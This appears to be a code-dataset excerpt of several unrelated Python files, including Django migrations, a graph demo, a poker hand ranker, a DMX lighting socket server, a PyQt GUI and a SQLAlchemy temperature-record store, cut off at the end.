T_ELIN[T_e,0]=Terminal_El_num[0][j]\n\n\n\nf=open(\"terminal_block_whole.txt\",'w')\n\nfor P in range(0,len(term_block)):\n \n f.write(\"%d\\n\" %(term_block[P] ))\nf.close()\n\n \nf=open(\"terminal_element_whole.txt\",'w')# this value is already minus one\n\nfor S in range(0,len(Terminal_El_num[0])):\n \n f.write(\"%d\\n\" %(Terminal_El_num[0][S]+1 ))\nf.close()\n'''\n\nnp.nonzero(term_block)\nnp.nonzero(T_ELIN)\nf=open(\"terminal_element_bl.txt\",'w')# this value is already minus one\n\nfor O in range(0,len(term_block)):\n \n f.write(\"%d %d\\n\" %(term_block[O], T_ELIN[O]+1 ))\nf.close()\n\n'''\n\n\n \n","repo_name":"wintun24/oxygen_model","sub_path":"TerminalBr.py","file_name":"TerminalBr.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3563075451","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.utils.timezone\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('agents', '0003_auto_20150218_1110'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='OutsideAgent',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('forename', models.CharField(max_length=32)),\n ('surname', models.CharField(max_length=64, null=True, blank=True)),\n ('mobile', models.CharField(max_length=64)),\n ('email', models.EmailField(max_length=255, null=True, blank=True)),\n ('photo', models.ImageField(null=True, upload_to=b'agent_photos', blank=True)),\n ('search', models.CharField(max_length=255, null=True, blank=True)),\n ('agency', models.ForeignKey(to='agents.Agency')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='agent',\n name='is_active',\n field=models.BooleanField(default=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='agent',\n name='is_admin',\n field=models.BooleanField(default=False),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='agent',\n name='last_login',\n field=models.DateTimeField(default=django.utils.timezone.now, verbose_name='last login'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='agent',\n name='password',\n field=models.CharField(default='test', max_length=128, verbose_name='password'),\n preserve_default=False,\n ),\n migrations.AlterField(\n model_name='agent',\n name='agency',\n field=models.ForeignKey(blank=True, to='agents.Agency', null=True),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='agent',\n name='email',\n field=models.EmailField(default='info@bienfacile.com', unique=True, max_length=255, verbose_name=b'email address'),\n preserve_default=False,\n ),\n migrations.AlterField(\n model_name='agent',\n name='forename',\n field=models.CharField(max_length=254),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='agent',\n name='mobile',\n field=models.CharField(max_length=254, null=True, blank=True),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='agent',\n name='photo',\n field=models.ImageField(null=True, upload_to=b'developer_images', blank=True),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='agent',\n name='surname',\n field=models.CharField(default='TEST', max_length=254),\n preserve_default=False,\n ),\n ]\n","repo_name":"TalentedSunday/Real-estate-app","sub_path":"agents/migrations/0004_auto_20150219_0932.py","file_name":"0004_auto_20150219_0932.py","file_ext":"py","file_size_in_byte":3281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2823615811","text":"# Creating Graph using Adjacency Matrix.\nprint()\n\nimport numpy as np\n\n\nclass Graph:\n def __init__(self,size):\n self.size=size\n self.graph=np.zeros((size,size))\n\n def Add_Edge(self,v1,v2):\n self.graph[v1][v2]=1\n self.graph[v2][v1]=1\n \n def Delete_Edge(self,v1,v2):\n if self.graph[v1][v2]==0 and self.graph[v2][v1]==0:\n print('\\nNo edge betwwen the vertex')\n else:\n self.graph[v1][v2]=0\n self.graph[v2][v1]=0\n\n def Print_Graph(self):\n print(self.graph)\n\n\nif __name__==\"__main__\":\n num=int(input(\"Enter the number of vertices: \"))\n G=Graph(num)\n while True:\n print('\\n================================')\n print('1: Insert Edges (Connect Vertex)')\n print('2: Delete Edges (Disconnect Vertex)')\n print('3: Display')\n print('4: Exit')\n ch=int(input(\"Enter Your choice: \"))\n\n if ch==1:\n v1,v2=input(\"Enter the space seperated two vertex: \").split()\n v1=int(v1)\n v2=int(v2)\n G.Add_Edge(v1,v2)\n elif ch==2:\n v1,v2=input(\"Enter the space seperated two vertex: \").split()\n v1=int(v1)\n v2=int(v2)\n G.Delete_Edge(v1,v2)\n elif ch==3:\n G.Print_Graph()\n elif ch==4:\n quit()\n else:\n print('\\nInvalid Choice')","repo_name":"puneet4840/Data-Structure-and-Algorithms","sub_path":"Graph in Python/1 - Implementation of Graph/1 - Create Graph using Adjacency Matrix.py","file_name":"1 - Create Graph using Adjacency Matrix.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12581141736","text":"from card import *\nfrom deck import *\nfrom copy import deepcopy\nfrom collections import Counter\n\"\"\"\nModule containing a PokerHand class\n\n:author: Neil Daterao\n\"\"\"\n\nmax_cards_in_hand = 5\n\nclass PokerHand: \n \"\"\"\n Class that creates a poker hand object \n \"\"\"\n \n def __init__(self,list_of_cards):\n \"\"\"\n Constructor initializes a copy of a deck of cards and an empty hand \n \"\"\"\n self.__list_of_cards = deepcopy(list_of_cards) #Creates a copy of the list of card objects\n self.__hand = [] \n for count in range(max_cards_in_hand):\n self.__hand.append(self.__list_of_cards[count])\n \n \n def add_card(self, card):\n \"\"\"\n Function that adds card object passed in as a parameter to the hand. Will throw an error if hand is already full\n \"\"\"\n #make so it can't add 6 cards\n if self.size() < 5:\n self.__hand.append(card)\n else:\n print(\"Error: Hand is full\")\n \n \n def get_ith_card(self, index):\n \"\"\"\n Return a card from the hand at the given index\n \n :return: a card object\n \"\"\"\n if index < 0:\n print(\"Error: Invalid Index, must be >= 0\")\n return None\n \n return self.__hand[index]\n \n \n def size(self):\n \"\"\"\n Get the current size of the hand\n \n :return: Integer representing the size of the hand\n \"\"\"\n return len(self.__hand)\n \n \n def __str__(self):\n \"\"\"\n Return string version of hand with one card per line\n \n :return: String version of the hand with one card per line\n \"\"\"\n \n string_version_of_hand = \"\"\n for card in self.__hand:\n string_version_of_hand += str(card) + \"\\n\"\n return string_version_of_hand\n \n \n def __is_flush(self):\n \"\"\"\n Determines if hand is a flush\n\n :return: Boolean, True if a flush and False if not\n \"\"\"\n first_card = self.get_ith_card(0)\n previous = first_card.get_suit()\n for card in self.__hand:\n if card.get_suit() != previous:\n return False\n previous = card.get_suit()\n return True \n \n \n def __num_of_pairs(self):\n \"\"\"\n Determines number of pairs in a hand\n\n :return: An integer representing the number of pairs \n \"\"\"\n \n rank_of_cards = []\n for card in self.__hand: \n rank_of_cards.append(card.get_rank())\n \n count_of_ranks = Counter(rank_of_cards)\n \n pairs = 0 \n for rank in count_of_ranks:\n if count_of_ranks[rank] == 4:\n pairs += 2\n elif count_of_ranks[rank] >= 2:\n pairs += 1\n else:\n pairs += 0\n return pairs\n \n \n def __determine_classification_of_hand(self):\n \"\"\"\n Determines the classification of a hand. In other words, if the hand is a pair, 2 pair, flush, or high card.\n \n :return: A string of the classification of the hand\n\n \"\"\"\n if self.__is_flush():\n return \"Flush\"\n elif self.__num_of_pairs() == 2:\n return \"Two pair\"\n elif self.__num_of_pairs() == 1:\n return \"Pair\"\n else:\n return \"High card\"\n \n \n def __translate_classification_of_hand_to_power_ranking(self):\n \"\"\"\n Function to translate the hand type into a number, 4 (strongest, Flush) to 1 (Weakest, High Card)\n \n :return: Integer of power ranking\n \"\"\"\n classification_of_hand = self.__determine_classification_of_hand()\n if classification_of_hand == \"Flush\":\n power_ranking = 4\n elif classification_of_hand == \"Two pair\":\n power_ranking = 3\n elif classification_of_hand == \"Pair\":\n power_ranking = 2\n else:\n power_ranking = 1\n return power_ranking\n \n \n def __get_ranks_of_hand_in_list(self):\n \"\"\"\n Translates the ranks of the cards in the hand into a list\n \n :return: A list of the ranks of the cards in the hands\n \"\"\"\n \n ranks_of_hand = []\n for index in range(max_cards_in_hand):\n ranks_of_hand.append(self.get_ith_card(index).get_rank())\n return ranks_of_hand\n \n \n def __determine_winning_flush(self, other_hand):\n \"\"\"\n Function to determine a winning flush given two hands that are flushes. Returns 1 if the \"self\" hand wins, -1 if the other hand wins and 0 if the hands tie. \n \n :param other_hand: A PokerHand object which is a flush \n :return: 1 if the \"self\" hand wins, -1 if the other hand wins and 0 if the hands tie. \n \"\"\"\n #Since we alreay know this is a flush, we have to check the ranks of the card and we can use the same algorithm we used to check high cards. \n \n return self.__determine_winning_high_card(other_hand)\n \n \n def __determine_winning_two_pair(self, other_hand):\n \"\"\"\n Function to determine which hand of two pairs is stronger\n \n :param other_hand: Another PokerHand Object which is classified as a two pair \n :return: Will return 1 if the \"self\" PokerHand is stronger, -1 if the other_hand PokerHand is stronger and 0 if they are of equal strength \n \"\"\"\n pairs_in_self = []\n extra_card_in_self = None\n pairs_in_other_hand = []\n extra_card_in_other_hand = None\n max_index = 2 #Magic number but since the function is private it's okay! The reason for this magic number is to account for hands where we are comparing 4 of a kind to a 2 regular 2 pair.\n \n ranks_in_self = self.__get_ranks_of_hand_in_list()\n ranks_in_other_hand = other_hand.__get_ranks_of_hand_in_list()\n \n counts_of_ranks_in_self = Counter(ranks_in_self)\n counts_of_ranks_in_other_hand = Counter(ranks_in_other_hand)\n \n for card in counts_of_ranks_in_self:\n if counts_of_ranks_in_self[card] >= 2:\n pairs_in_self.append(card)\n else:\n extra_card_in_self = card \n \n for card in counts_of_ranks_in_other_hand:\n if counts_of_ranks_in_other_hand[card] >= 2:\n pairs_in_other_hand.append(card)\n else:\n extra_card_in_other_hand = card \n \n pairs_in_self.sort(reverse=True)\n pairs_in_other_hand.sort(reverse=True)\n \n if len(pairs_in_self) != len(pairs_in_other_hand):\n max_index = 1\n \n for card_count in range(0,max_index):\n if pairs_in_self[card_count] > pairs_in_other_hand[card_count]:\n return 1\n elif pairs_in_self[card_count] < pairs_in_other_hand[card_count]:\n return -1\n \n return extra_card_in_self - extra_card_in_other_hand\n \n \n def __determine_winning_one_pair(self, other_hand):\n \"\"\"\n Function to determine which hand of pairs is stronger\n \n :param other_hand: Another PokerHand Object which is classified as a Pair \n :return: Will return 1 if the \"self\" PokerHand is stronger, -1 if the other_hand PokerHand is stronger and 0 if they are of equal strength \n \"\"\"\n pair_in_self = None\n extra_cards_in_self = []\n pair_in_other_hand = None\n extra_cards_in_other_hand = []\n max_index = 3 #Magic number again, but it's okay since it is a private function, this is to account for comparing three of a kind with one pair, the list of extra cards will be different lengths and we want to iterate through the smallest sorted array.\n \n ranks_in_self = self.__get_ranks_of_hand_in_list()\n ranks_in_other_hand = other_hand.__get_ranks_of_hand_in_list() \n \n for card_rank in ranks_in_self:\n if card_rank in extra_cards_in_self:\n pair_in_self = card_rank\n else:\n extra_cards_in_self.append(card_rank)\n \n for card_rank in ranks_in_other_hand:\n if card_rank in extra_cards_in_other_hand:\n pair_in_other_hand = card_rank\n else:\n extra_cards_in_other_hand.append(card_rank)\n \n extra_cards_in_self.sort(reverse=True)\n extra_cards_in_other_hand.sort(reverse=True)\n \n if len(extra_cards_in_self) != len(extra_cards_in_other_hand):\n max_index = 2 \n \n if pair_in_self == pair_in_other_hand:\n for card_count in range(max_index):\n if extra_cards_in_self[card_count] > extra_cards_in_other_hand[card_count]:\n return 1\n elif extra_cards_in_self[card_count] < extra_cards_in_other_hand[card_count]:\n return -1 \n \n return pair_in_self - pair_in_other_hand\n \n \n def __determine_winning_high_card(self,other_hand):\n \"\"\"\n Function to determine which hand of high cards is stronger\n \n :param other_hand: Another PokerHand Object which is classified as a High Card\n :return: Will return 1 if the \"self\" PokerHand is stronger, -1 if the other_hand PokerHand is stronger and 0 if they are of equal strength \n \"\"\"\n \n ranks_of_self_hand = self.__get_ranks_of_hand_in_list()\n ranks_of_other_hand = other_hand.__get_ranks_of_hand_in_list()\n \n ranks_of_self_hand.sort(reverse= True)\n ranks_of_other_hand.sort(reverse= True)\n \n card_count = 0 \n while card_count < max_cards_in_hand:\n if ranks_of_self_hand[card_count] == ranks_of_other_hand[card_count]:\n card_count += 1\n elif ranks_of_self_hand[card_count] > ranks_of_other_hand[card_count]:\n return 1\n elif ranks_of_self_hand[card_count] < ranks_of_other_hand[card_count]:\n return -1\n return 0\n \n\n def compare_to(self, other_hand):\n \"\"\"\n Determines which of two poker hands is worth more. Returns an int\n which is either positive, negative, or zero depending on the comparison.\n \n :param self: The first hand to compare\n :param other_hand: The second hand to compare\n :return: a negative number if self is worth LESS than other_hand,\n zero if they are worth the SAME (a tie), and a positive number if\n self is worth MORE than other_hand\n \"\"\"\n classification_of_self_hand = self.__determine_classification_of_hand()\n classification_of_other_hand = other_hand.__determine_classification_of_hand()\n power_ranking_of_hand = self.__translate_classification_of_hand_to_power_ranking()\n power_ranking_of_other_hand = other_hand.__translate_classification_of_hand_to_power_ranking()\n \n if power_ranking_of_hand - power_ranking_of_other_hand == 0:\n if classification_of_self_hand == \"Flush\":\n return self.__determine_winning_flush(other_hand)\n elif classification_of_self_hand == \"Two pair\":\n return self.__determine_winning_two_pair(other_hand)\n elif classification_of_self_hand == \"Pair\":\n return self.__determine_winning_one_pair(other_hand)\n else:\n return self.__determine_winning_high_card(other_hand)\n \n else:\n return power_ranking_of_hand - power_ranking_of_other_hand\n \n\nif __name__ == \"__main__\":\n #messy tests\n hand = PokerHand([Card(13, \"D\"), Card(10,\"D\"), Card(5,\"D\"), Card(4,\"D\"), Card(2, \"D\")])\n hand1 = PokerHand([Card(8, \"C\"), Card(8,\"D\"), Card(3,\"H\"), Card(3,\"S\"), Card(6, \"D\")])\n hand3 = PokerHand([Card(8, \"C\"), Card(8,\"D\"), Card(3,\"H\"), Card(3,\"S\"), Card(7, \"D\")])\n \n hand4 = PokerHand([Card(4, \"D\"), Card(4, \"C\"), Card(4, \"S\"), Card(4,\"D\"), Card(12, \"S\")])\n hand5 = PokerHand([Card(7, \"D\"), Card(7, \"C\"), Card(7, \"S\"), Card(6,\"D\"), Card(6, \"S\")])\n\n hand2 = PokerHand([Card(13, \"D\"), Card(10,\"D\"), Card(7,\"D\"), Card(4,\"D\"), Card(2, \"D\")])\n print(hand.compare_to(hand1))\n print(hand1.compare_to(hand3))\n print(hand4.compare_to(hand5))\n ","repo_name":"NeilD-18/CSC-120","sub_path":"Project 2 - How Does it Rank? ND/poker_hand.py","file_name":"poker_hand.py","file_ext":"py","file_size_in_byte":12415,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"69938380909","text":"import socketio\nimport eventlet\nimport eventlet.wsgi\nfrom flask import Flask\n\nfrom pyenttec import DMXConnection\n\nport = DMXConnection('/dev/ttyUSB0')\n\nsio = socketio.Server()\napp = Flask(__name__)\n\ndef chunks(l, n):\n \"\"\"Yield successive n-sized chunks from l.\"\"\"\n for i in range(0, len(l), n):\n yield l[i:i + n]\n\ndef send_pixels(rgb_tuples):\n # print(\"sending pixel: {}\".format(rgb_tuples))\n for bar_number, bar_rgb_tuples in enumerate(chunks(rgb_tuples, 8)):\n if bar_number == 0:\n offset = 0\n else:\n offset = bar_number * 34\n brightness_channel = 33 + offset\n # print('brightness_channel: {}'.format(brightness_channel))\n port.dmx_frame[brightness_channel] = 255\n for rgb_tuple in bar_rgb_tuples:\n rgb_tuple.append(0)\n #print(rgb_tuple)\n for channel, value in enumerate(sum(bar_rgb_tuples, [])):\n # print(\"channel: {} value: {}\".format(channel+offset, value))\n port.dmx_frame[channel+offset] = value\n # port.dmx_frame[33] = randint(0,255)\n # for channel, value in enumerate(sum(rgb_tuples, [])):\n # for channel in range(0, 31):\n # port.dmx_frame[channel] = value\n # sleep(0.1)\n port.render()\n\n@sio.on('connect', namespace='/chat')\ndef connect(sid, environ):\n print(\"connect \", sid)\n\n@sio.on('chat message', namespace='/chat')\ndef message(sid, data):\n # print(\"message \", data)\n send_pixels(data)\n\n@sio.on('disconnect', namespace='/chat')\ndef disconnect(sid):\n print('disconnect ', sid)\n\nif __name__ == '__main__':\n # wrap Flask application with engineio's middleware\n app = socketio.Middleware(sio, app)\n\n # deploy as an eventlet WSGI server\n eventlet.wsgi.server(eventlet.listen(('', 9000)), app)\n","repo_name":"Iteratix/pixels","sub_path":"flask_server_bar.py","file_name":"flask_server_bar.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2151282593","text":"#!/usr/bin/env python3\n\nimport csv\nimport sys\nimport pipeclient\nimport ptp\n\n\nclass ReadWriteSequenceHandler:\n def __init__(self, client: pipeclient.PipeClient):\n self.__pipe_client = client\n\n def run(self, cmd: str):\n self.__pipe_client.write(cmd)\n self.__pipe_client.read()\n\n\nif __name__ == '__main__':\n client = pipeclient.PipeClient('utf-8')\n handler = ReadWriteSequenceHandler(client)\n handler.run('SelectAll:')\n with open('tracklist.csv', 'r', newline='', encoding='utf-8') as f:\n reader = csv.reader(f)\n try:\n for row in reader:\n handler.run('Select: Start={} End={}'.format(\n ptp.colon_to_sec(row[2]), ptp.colon_to_sec(row[3])))\n handler.run('AddLabel: ')\n handler.run('SetLabel: Label={} Text=\"{}\"'.format(\n int(row[0]) - 1, row[1]))\n except csv.Error as e:\n sys.exit('file {}, line {}: {}'.format(f, reader.line_num, e))\n","repo_name":"VasiliiGeneralov/last_trial","sub_path":"tracklist_reader.py","file_name":"tracklist_reader.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32421828445","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('main', '0021_auto_20140911_1505'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='surveyevent',\n name='guid',\n field=models.CharField(max_length=50, null=True, blank=True),\n preserve_default=True,\n ),\n ]\n","repo_name":"joepetrini/bike-counter","sub_path":"webapp/main/migrations/0022_surveyevent_guid.py","file_name":"0022_surveyevent_guid.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"42283244638","text":"import sys\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nimport calsheet\nimport mapdata\nimport oldata\n\nclass steppermatch(QWidget):\n def __init__(self):\n super().__init__()\n self.initUI()\n\n def initUI(self):\n self.but_data = QPushButton('选择数据文件', self)\n self.but_data.clicked.connect(self.but_data_click)\n\n self.line_data = QLineEdit('')\n\n self.but_map = QPushButton('选择map文件', self)\n self.but_map.clicked.connect(self.but_map_click)\n\n self.line_map = QLineEdit('')\n\n self.but_load = QPushButton('Load', self)\n self.but_load.clicked.connect(self.but_load_click)\n\n self.lbl_pix1 = QLabel(self)\n self.lbl_pix2 = QLabel(self)\n self.pixmap1 = QPixmap('')\n self.pixmap2 = QPixmap('')\n self.lbl_pix1.setPixmap(self.pixmap1)\n self.lbl_pix2.setPixmap(self.pixmap2)\n\n\n self.cal_list=QStandardItemModel(0,7)\n self.cal_list.setHorizontalHeaderLabels(['区域','OffsetX', \\\n 'OffsetY','Theta','Scalx','Scaly','Orth'])\n self.tableView=QTableView()\n self.tableView.setModel(self.cal_list)\n self.tableView.resizeColumnsToContents()\n\n\n \n grid = QGridLayout()\n grid.setSpacing(10)\n grid.addWidget(self.but_data,0,0,1,1)\n grid.addWidget(self.line_data,0,1,1,4)\n grid.addWidget(self.but_load,0,5,1,1)\n grid.addWidget(self.but_map,1,0,1,1)\n grid.addWidget(self.line_map,1,1,1,4)\n grid.addWidget(self.lbl_pix1,2,0,1,3)\n grid.addWidget(self.lbl_pix2,2,3,1,3)\n grid.addWidget(self.tableView,3,0,1,5)\n \n\n \n\n \n self.setLayout(grid)\n\n \n self.setGeometry(60, 60, 1200, 800) \n self.setWindowTitle(\"Stepper match-个人版\")\n self.show()\n \n def but_data_click(self):\n fileName,filetype=QFileDialog.getOpenFileName(self,\"选择文件\",'M:\\\\',\"(*.csv)\")\n self.line_data.setText(fileName)\n \n def but_map_click(self):\n fileName,filetype=QFileDialog.getOpenFileName(self,\"选择文件\",'M:\\\\',\"(*)\")\n self.line_map.setText(fileName)\n\n def but_load_click(self):\n mapobj = mapdata.mapata(self.line_map.displayText())\n olobj = oldata.oldata(self.line_data.displayText())\n a = calsheet.calmode(olobj.oldata_x,olobj.oldata_y,olobj.oldata_dx,olobj.oldata_dy)\n a.regionjudge(mapobj)\n a.ol_map('1')\n b = a.shiftadj()\n b.ol_map('2')\n c = b.mincal()\n c.ol_map('3')\n\n\n \n self.pixmap1.load('1.jpg')\n self.pixmap2.load('2.jpg')\n self.lbl_pix1.setPixmap(self.pixmap1)\n self.lbl_pix2.setPixmap(self.pixmap2)\n\n self.cal_list=QStandardItemModel(len(c.adj_result),7)\n self.cal_list.setHorizontalHeaderLabels(['区域','OffsetX', \\\n 'OffsetY','Theta','Scalx','Scaly','Orth'])\n self.tableView.setModel(self.cal_list)\n self.tableView.resizeColumnsToContents()\n \n row_num = 0\n for region_id in c.adj_result:\n self.cal_list.setItem(row_num, 0, QStandardItem(region_id))\n #self.cal_list.setItem(row_num, 1, QStandardItem(str(c.adj_result[region_id]['center'][0])))\n #self.cal_list.setItem(row_num, 2, QStandardItem(str(c.adj_result[region_id]['center'][1])))\n self.cal_list.setItem(row_num, 1, QStandardItem(str(c.adj_result[region_id]['OffsetX'])))\n self.cal_list.setItem(row_num, 2, QStandardItem(str(c.adj_result[region_id]['OffsetY'])))\n self.cal_list.setItem(row_num, 3, QStandardItem(str(c.adj_result[region_id]['Theta'])))\n self.cal_list.setItem(row_num, 4, QStandardItem(str(c.adj_result[region_id]['Scalx'])))\n self.cal_list.setItem(row_num, 5, QStandardItem(str(c.adj_result[region_id]['Scaly'])))\n self.cal_list.setItem(row_num, 6, QStandardItem(str(c.adj_result[region_id]['Orth'])))\n \n \n row_num = row_num + 1\n self.tableView.resizeColumnsToContents()\n\n\n \n \n\nif __name__ == '__main__':\n \n app = QApplication(sys.argv)\n ex = steppermatch()\n sys.exit(app.exec_())\n","repo_name":"hukaijun2008/a-code-store","sub_path":"python/azoresfeedback/steppermatch.py","file_name":"steppermatch.py","file_ext":"py","file_size_in_byte":4301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39478454431","text":"import sys\nimport os\nimport glob\nimport json\nimport uuid\n\nfrom sqlalchemy import Column\n\nfrom sqlalchemy import Integer\nfrom sqlalchemy import String\nfrom sqlalchemy import Float\nfrom sqlalchemy import Boolean\n\nfrom sqlalchemy.orm import declarative_base\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import delete\n\nfrom const import DEFAULT_PATH, DEFAULT_PATH_INQ\n\n\ndef create_id():\n return uuid.uuid4().hex\n\n\n_a_id = create_id()\nLEN_ID = len(_a_id)\n\nBase = declarative_base()\n\n\n# todo add migration scripts\nVER = 1\n\n\nclass TempRec(Base):\n __tablename__ = \"temp_rec\"\n\n id = Column(String(LEN_ID), primary_key=True)\n\n tag = Column(String(LEN_ID << 1), nullable=True)\n\n year = Column(Integer, nullable=False)\n month = Column(Integer, nullable=False)\n day = Column(Integer, nullable=False)\n\n year_month_day = Column(String(8), nullable=False)\n year_month = Column(String(6), nullable=False)\n month_day = Column(String(4), nullable=False)\n\n hour = Column(Integer, nullable=False)\n minute = Column(Integer, nullable=False)\n second = Column(Integer, nullable=False)\n\n if VER > 1:\n hour_minute_second = Column(String(6), nullable=False)\n\n is_utc = Column(Boolean, default=True)\n time_stamp = Column(Float, nullable=False)\n\n temperature = Column(Float, nullable=False)\n pressure = Column(Float, nullable=False)\n\n def __repr__(self):\n flds = {}\n for f in [\n \"id\",\n \"tag\",\n \"year\",\n \"month\",\n \"day\",\n \"hour\",\n \"minute\",\n \"second\",\n \"is_utc\",\n \"time_stamp\",\n \"temperature\",\n \"pressure\",\n ]:\n flds[f] = self.__dict__[f]\n return f\"TempRec({flds})\"\n\n\ndef get_db_path(path=None):\n if path is None:\n path = DEFAULT_PATH\n db_path = os.path.join(path, \"tempres.db\")\n db_path = os.path.expanduser(db_path)\n db_path = os.path.expandvars(db_path)\n return db_path\n\n\ndef get_db_spec(db_path):\n db_path = \"sqlite://\" + os.sep + db_path\n print(\"db_path\", db_path)\n return db_path\n\n\ndef open_db(db_spec, echo=False):\n engine = create_engine(db_spec, echo=echo)\n return engine\n\n\ndef create_db_meta(engine):\n meta = Base.metadata.create_all(engine)\n return meta\n\n\ndef strip_tag(tag):\n if tag is not None:\n tag = tag.strip()\n if len(tag) == 0:\n tag = None\n return tag\n\n\ndef insert_rec(engine, data, tag=None):\n\n tag = strip_tag(tag)\n\n _time = data[\"time\"]\n\n _temperature = float(data[\"temperature\"])\n _pressure = float(data[\"pressure\"])\n _utc = data[\"utc\"]\n _time_stamp = float(data[\"time_ux\"])\n\n with Session(engine) as session:\n if VER > 1:\n db_rec = TempRec(\n id=create_id(),\n tag=tag,\n year=_time[0],\n month=_time[1],\n day=_time[2],\n year_month_day=f\"{_time[0]:04}{_time[1]:02}{_time[2]:02}\",\n year_month=f\"{_time[0]:04}{_time[1]:02}\",\n month_day=f\"{_time[1]:02}{_time[2]:02}\",\n hour_minute_second=f\"{_time[3]:02}{_time[4]:02}{_time[5]:02}\",\n hour=_time[3],\n minute=_time[4],\n second=_time[5],\n is_utc=_utc,\n time_stamp=_time_stamp,\n temperature=_temperature,\n pressure=_pressure,\n )\n else:\n db_rec = TempRec(\n id=create_id(),\n tag=tag,\n year=_time[0],\n month=_time[1],\n day=_time[2],\n year_month_day=f\"{_time[0]:04}{_time[1]:02}{_time[2]:02}\",\n year_month=f\"{_time[0]:04}{_time[1]:02}\",\n month_day=f\"{_time[1]:02}{_time[2]:02}\",\n hour=_time[3],\n minute=_time[4],\n second=_time[5],\n is_utc=_utc,\n time_stamp=_time_stamp,\n temperature=_temperature,\n pressure=_pressure,\n )\n\n session.add(db_rec)\n session.commit()\n\n\n#\n\n\ndef get_date(data):\n year = data[\"time\"][0]\n month = data[\"time\"][1]\n day = data[\"time\"][2]\n\n hour = data[\"time\"][3]\n minute = data[\"time\"][4]\n second = data[\"time\"][5]\n\n return year, month, day, hour, minute, second\n\n\ndef build_date_qry(session, data, tag=None, exclude_tag=False, full=False):\n tag = strip_tag(tag)\n year, month, day, hour, minute, second = get_date(data)\n qry = (\n (session.query(TempRec) if full else session.query(TempRec.id))\n .where(TempRec.year.is_(year))\n .where(TempRec.month.is_(month))\n .where(TempRec.day.is_(day))\n .where(TempRec.hour.is_(hour))\n .where(TempRec.minute.is_(minute))\n .where(TempRec.second.is_(second))\n )\n if not exclude_tag:\n qry = qry.where(TempRec.tag.is_(tag))\n\n return qry\n\n\ndef qry_date(engine, data, tag=None, exclude_tag=False, full=False):\n with Session(engine) as session:\n qry = build_date_qry(session, data, tag, exclude_tag, full)\n return qry.all()\n\n\ndef qry_count_date(engine, date, tag=None, exclude_tag=False):\n with Session(engine) as session:\n qry = build_date_qry(session, date, tag, exclude_tag, False)\n return qry.count()\n\n\n#\n\n\ndef filter_tag_date(\n qry, tag=None, exclude_tag=False, full=False, from_date=None, to_date=None\n):\n if tag:\n tag = strip_tag(tag)\n if len(tag) == 0:\n tag = None\n if not exclude_tag:\n qry = qry.where(TempRec.tag.is_(tag))\n if from_date:\n qry = qry.where(TempRec.time_stamp >= from_date)\n if to_date:\n qry = qry.where(TempRec.time_stamp <= to_date)\n return qry\n\n\ndef qry_all(\n engine, tag=None, exclude_tag=False, full=False, from_date=None, to_date=None\n):\n with Session(engine) as session:\n qry = session.query(TempRec) if full else session.query(TempRec.id)\n qry = filter_tag_date(\n qry,\n tag=tag,\n exclude_tag=exclude_tag,\n full=full,\n from_date=from_date,\n to_date=to_date,\n )\n return qry.all()\n\n\ndef qry_count_all(\n engine, tag=None, exclude_tag=False, full=False, from_date=None, to_date=None\n):\n with Session(engine) as session:\n qry = session.query(TempRec.id)\n qry = filter_tag_date(\n qry,\n tag=tag,\n exclude_tag=exclude_tag,\n full=full,\n from_date=from_date,\n to_date=to_date,\n )\n return qry.count()\n\n\n#\n\n\ndef delete_id(engine, id):\n with Session(engine) as session:\n session.execute(delete(TempRec).where(TempRec.id.is_(id)))\n session.commit()\n\n\ndef delete_all(engine, iter_id):\n for id in iter_id:\n delete_id(engine, id)\n\n\n#\n\n\ndef dump_all(engine, tag=None, exclude_tag=False, full=False):\n found = 0\n recs = []\n for dbrec in qry_all(engine, tag=tag, exclude_tag=exclude_tag, full=full):\n print(dbrec)\n if not full:\n recs.append(dbrec[0])\n else:\n recs.append(dbrec)\n found = found + 1\n print(\"found\", found)\n\n\ndef configure_engine():\n db_path = get_db_path()\n print(\"db exists\", os.path.exists(db_path))\n\n db_spec = get_db_spec(db_path)\n engine = open_db(db_spec)\n create_db_meta(engine)\n return engine\n\n\n# todo\ntag = \" \"\n\n\ndef main_func(tag=None):\n\n tag = strip_tag(tag)\n\n engine = configure_engine()\n\n pat = os.path.join(DEFAULT_PATH_INQ, \"**\", \"tempres-*.json\")\n pat = os.path.expanduser(pat)\n pat = os.path.expandvars(pat)\n print(\"pattern\", pat)\n\n skip_existing = 0\n inserted = 0\n\n for fe in glob.iglob(pat, recursive=True):\n with open(fe) as f:\n try:\n cont = f.read()\n data = 